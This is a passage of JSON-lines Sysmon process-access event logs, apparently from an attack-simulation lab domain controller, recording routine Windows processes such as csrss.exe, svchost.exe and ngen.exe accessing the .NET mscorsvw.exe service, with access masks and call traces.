scorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.809\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001084530C00}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.809","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001084530C00}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.825\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001084530C00}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.825","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001084530C00}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.856\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00109B450B00}\r\nTargetProcessId: 2200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.856","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00109B450B00}","TargetProcessId":"2200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.856\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00109B450B00}\r\nTargetProcessId: 2200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.856","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00109B450B00}","TargetProcessId":"2200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.872\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001060570C00}\r\nTargetProcessId: 2200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.872","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001060570C00}","TargetProcessId":"2200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.887\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010389D0B00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.887","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010389D0B00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.887\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010389D0B00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.887","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010389D0B00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010389D0B00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010389D0B00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\